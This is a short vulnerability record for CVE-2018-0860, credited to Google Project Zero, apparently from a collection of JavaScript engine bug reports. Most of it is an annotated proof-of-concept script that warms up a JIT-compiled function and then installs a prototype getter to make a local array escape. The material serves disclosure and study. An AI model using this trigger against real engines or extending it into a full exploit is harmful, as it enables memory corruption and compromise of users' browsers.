
CVE-2018-0860.md


CVE-2018-0860

  • Fix: Feb 2018
  • Credit: lokihardt of Google Project Zero

PoC

/**
 * Creates a fresh empty array and returns the result of reading its 'x'
 * property.
 *
 * The array literal has no own 'x', so the lookup falls through to the
 * prototype chain: the result is undefined unless 'x' is defined on
 * Array.prototype or Object.prototype.
 *
 * @returns {*} Whatever the 'x' lookup on the local array evaluates to.
 */
function opt() {
    // Local array; nothing else in this function stores it or passes it on.
    let arr = [];
    // Named property read. If 'x' resolves to an accessor on the prototype
    // chain, the getter runs with `arr` as its receiver, so this line is
    // only side-effect free while no such accessor exists.
    return arr['x'];
}

/**
 * Reproduction driver: calls opt() repeatedly, then installs an accessor
 * for 'x' on Array.prototype and prints the result of one more opt() call.
 */
function main() {
    // Not referenced again anywhere in this function.
    let arr = [1.1, 2.2, 3.3];
    // 0x10000 (65536) calls made while no 'x' exists on the prototype chain.
    // Presumably a warm-up so the engine's JIT compiles opt() under that
    // assumption; confirm against the advisory.
    for (let i = 0; i < 0x10000; i++) {
        opt();
    }

    // From here on every array inherits a getter for 'x'.
    // Object.prototype.valueOf returns its receiver, so the read inside opt()
    // now evaluates to opt()'s local array instead of undefined.
    // NOTE(review): code compiled before this point has to observe the
    // prototype change; a regression test for the fix would presumably
    // assert on the value printed below. Confirm with the patch.
    Array.prototype.__defineGetter__('x', Object.prototype.valueOf);

    // `print` is not defined in this listing; presumably the output function
    // of the engine's command-line host.
    print(opt());
}

// Entry point: runs the reproduction as soon as the script is loaded.
main();

Reference